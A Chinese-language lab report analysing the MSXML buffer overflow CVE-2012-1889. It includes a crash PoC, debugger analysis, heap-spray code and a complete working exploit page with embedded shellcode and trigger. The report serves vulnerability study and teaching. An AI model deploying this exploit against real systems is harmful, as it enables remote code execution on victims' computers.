Microsoft XML Core Services缓冲区溢出漏洞（CVE-2012-1889）漏洞分析报告

软件名称： Microsoft XML Core Services

软件版本：XML 3.0/4.0/5.0/6.0

漏洞模块：msxml3.dll.

实验系统：windows xp sp3

漏洞影响系统：windows XP/7/8/8.1

漏洞编号：CVE-2012-1889

危害等级：高危

漏洞类型：缓冲区溢出

威胁类型：远程

1. 软件简介

    Microsoft XML Core Services (MSXML)是一组服务，可用JScript、VBScript、Microsoft开发工具编写的应用构建基于XML的Windows-native应用。 

1. 漏洞成因

据CVE-2012-1889描述，Microsoft XML Core Services中的漏洞可能允许远程执行代码。微软公司将该漏洞编号为MS12-043，其描述是：“Microsoft XML Core Services处理内存中的对象的方式中存在一个远程执行代码漏洞。如果用户查看包含特制内容的网站，则该漏洞可能允许远程执行代码。成功利用此漏洞的攻击者可以完全控制受影响的系统。攻击者可随后安装程序；查看、更改或删除数据；或者创建拥有完全用户权限的新帐户。那些帐户被配置为拥有较少系统用户权限的用户比具有管理用户权限的用户受到的影响要小。”

1. 利用过程

3.1漏洞触发

1.Poc，网络上流传的POC代码如下

<html>

<head>

    <title>CVE 2012-1889 PoC</title>

</head>

<body>

    <object classid="clsid:f6D90f11-9c73-11d3-b32e-00C04f990bb4" id='poc'></object>

    <script>

        var obj = document.getElementById('poc').object;

        var src = unescape("%u0c0c%u0c0c");

        while (src.length < 0x1002) src += src;

        src = "\\\\xxx" + src;

        src = src.substr(0, 0x1000 - 10);

        var pic = document.createElement("img");

        pic.src = src;

        pic.nameProp;

        obj.definition(0);

    </script>

</body>

</html>

2.将上面的代码保存为HTML文件，并且用IE6打开，并且在警告栏上允许允许阻止的内容，这时候IE浏览器就会崩溃

 

触发漏洞的代码是JavaScript中最后一句，即第16行的obj.definition(0)。definition是DOM对象的一个属性，而且是只读的属性，不可以把属性当作函数来使用并往里面传递参数。

此时再次用IE打开这个网页，先不允许运行，先用windbg附加上去

 

输入g让程序跑起来，然后把警告的内容运行执行，让程序触发异常，断在异常处。

 

在执行ecx，dword ptr[eax]的时候，eax的值是0x0C0C0C0C，在0x0C0C0C0C的位置上，并不可读，所以触发了一个异常访问的异常，eax的值来自于ebp-14h内存处的值，在执行完对eax的赋值操作之后，程序比较了eax和ebx寄存器的内容，如果eax的内容为0就会跳转，越过触发异常的代码，但是PoC代码在栈上产生了大量的0c0c字节，于是eax不为0，跳转也不会执行。

如果要执行代码，就需要修改EIP寄存器的内容，call dword ptr [ecx+18h]处，这个地方刚好够我们转移EIP。

如果0x0C0C0C0C处存在可以读的内存，那么就不会触发访问异常的情况了，程序就会跳转到0x0C0C0C0C+0x18处执行代码，如果在这里放上我们构建好的代码，那么漏洞触发时，就可以执行了

3.2 HeapSpray

在使用HeapSpray的时候，一般会将EIP指向0x0C0C0C0C的位置上，然后利用JavaScript申请大量堆内存，并且用包含0x90和shellcode的内存覆盖这些内存，通常，JavaScript会从内存的低地址向高地址分配内存，因此申请的内存超过200MB（200MB = 200*1024*1024 = 0x0C800000 > 0x0C0C0C0C）后，0x0C0C0C0C将被含有ShellCode的内存片覆盖。只要内存片中的0×90能够命中0x0C0C0C0C的位置，ShellCode就能最终得到执行。

3.1.1内存覆盖代码

1 2 3 4 5 6 7 8 9

var nop = "\u9090\u9090"; while (nop.length < 0x100000/2){     nop += nop; } nop = nop.substring(0, 0x100000/2 - 32/2 - 4/2 - shellcode.length - 2/2); var slide = new Array(); for (var i = 0; i < 200; i++){     slide[i] = nop + shellcode; }

上面的代码分配了200个1M大小的内存块，每个内存块由shellcode和大量滑板指令0x90构成，其中shellcode位于每个内存块的最末尾部分。

在触发漏洞时，只需要有任意一个内存块的任意一个滑板指令NOP可以覆盖在0c0C0C0C0C上面，Shellcode最终都会被执行，使用1M作为内存块的单位，可以使覆盖成功的几率增加，如果尺寸太小，0x0C0C0C0C的位置可能会被Shellcode所覆盖，这样的话，溢出就失败了。

3.3 漏洞攻击实验

 

 

1. PoC

 <html>

<head>

    <title>CVE 2012-1889 PoC v3 By:15PB.Com</title>

</head>

<body>

    <object classid="clsid:f6D90f11-9c73-11d3-b32e-00C04f990bb4" id='15PB'></object>

    <script>

    // 1.  准备好Shellcode（unescape()是解码函数）

var cShellcode = unescape(

"\u8360\u20EC\u4CEB\u6547\u5074\u6F72\u4163\u6464" +

"\u6572\u7373\u6F4C\u6461\u694C\u7262\u7261\u4579" +

"\u4178\u5500\u6573\u3372\u2E32\u6C64\u006C\u654D" +

"\u7373\u6761\u4265\u786F\u0041\u7845\u7469\u7250" +

"\u636F\u7365\u0073\u6548\u6C6C\u206F\u3531\u4250" +

"\u0021\u00E8\u0000\u5B00\u8B64\u3035\u0000\u8B00" +

"\u0C76\u768B\u8B1C\u8B36\u0856\u5253\u12E8\u0000" +

"\u8B00\u8DF0\uBD4B\u5251\uD0FF\u5653\u5250\u6EE8" +

"\u0000\u5500\uEC8B\uEC83\u520C\u558B\u8B08\u3C72" +

"\u348D\u8B32\u7876\u348D\u8B32\u1C7E\u3C8D\u893A" +

"\uFC7D\u7E8B\u8D20\u3A3C\u7D89\u8BF8\u247E\u3C8D" +

"\u893A\uF47D\uC033\u01EB\u8B40\uF875\u348B\u8B86" +

"\u0855\u348D\u8B32\u0C5D\u7B8D\uB9AF\u000E\u0000" +

"\uF3FC\u75A6\u8BE3\uF475\uFF33\u8B66\u463C\u558B" +

"\u8BFC\uBA34\u558B\u8D08\u3204\u8B5A\u5DE5\u08C2" +

"\u5500\uEC8B\uEC83\u8B08\u145D\u4B8D\u6ACC\u6A00" +

"\u5100\u55FF\u8D0C\uD74B\u5051\u55FF\u8910\uFC45" +

"\u4B8D\u51E3\u75FF\uFF08\u1055\u4589\u8DF8\uEF4B" +

"\u006A\u5151\u006A\u55FF\u6AFC\uFF00\uF855\uE58B" +

"\uC25D\u0010\u0000");

// 2.  制作一块划板数据

// 2.1 计算填充划板指令数据的大小（都除2是因为length返回的是Unicode的字符个数）

var nSlideSize      = 1024*1024 / 2;     // 一个划板指令区的大小（1MB）

var nMlcHadSize     = 32        / 2;     // 堆头部大小

var nStrLenSize     = 4         / 2;     // 堆长度信息大小

var nTerminatorSize = 2         / 2;     // 堆结尾符号大小

var nScSize         = cShellcode.length; // Shellcode大小

var nFillSize       = nSlideSize-nMlcHadSize-nStrLenSize-nScSize-nTerminatorSize;

// 2.2 填充划板指令，制作好一块填充数据

var cFillData  = unescape("\u0C0C\u0C0C"); // 划板指令0C0C   OR AL,0C

var cSlideData = new Array();              // 申请一个数组对象用于保存划板数据

while (cFillData.length <= nSlideSize)

cFillData += cFillData;

cFillData = cFillData.substring(0, nFillSize);

// 3.  填充200MB的内存区域（申请200块1MB大小的划板数据区），试图覆盖0x0C0C0C0C

//     区域，每块划板数据均由 划板数据+Shellcode组成，这样只要任意一块划板数据

//     正好落在0x0C0C0C0C处，大量无用的“OR AL,0C”就会将执行流程引到划板数据区

//     后面的Shellcode处，进而执行Shellcode。

for (var i = 0; i < 200; i++)

cSlideData[i] = cFillData + cShellcode;

    // 4.  触发CVE 2012-1889漏洞

// 4.1 获取名为15PB的XML对象，并将其保存到名为obj15PB实例中

        var obj15PB = document.getElementById('15PB').object;

// 4.2 构建一个长度为0x1000-10=8182，起始内容为“\\15PB_Com”字节的数据

        var srcImgPath = unescape("\u0C0C\u0C0C");

        while (srcImgPath.length < 0x1000)

            srcImgPath += srcImgPath;

        srcImgPath = "\\\\15PB_Com" + srcImgPath;

        srcImgPath = srcImgPath.substr(0, 0x1000-10);

        // 4.3 创建一个图片元素，并将图片源路径设为srcImgPath，并返回当前图片文件名

        var emtPic = document.createElement("img");

        emtPic.src = srcImgPath;

        emtPic.nameProp;

        // 4.4 定义对象obj15PB（触发溢出）

        obj15PB.definition(0);

    </script>

</body>

</html>

5.参考资料

CSDN博客

《软件调试》张银奎 著

《0day安全：软件漏洞分析技术（第2版）》 王清 著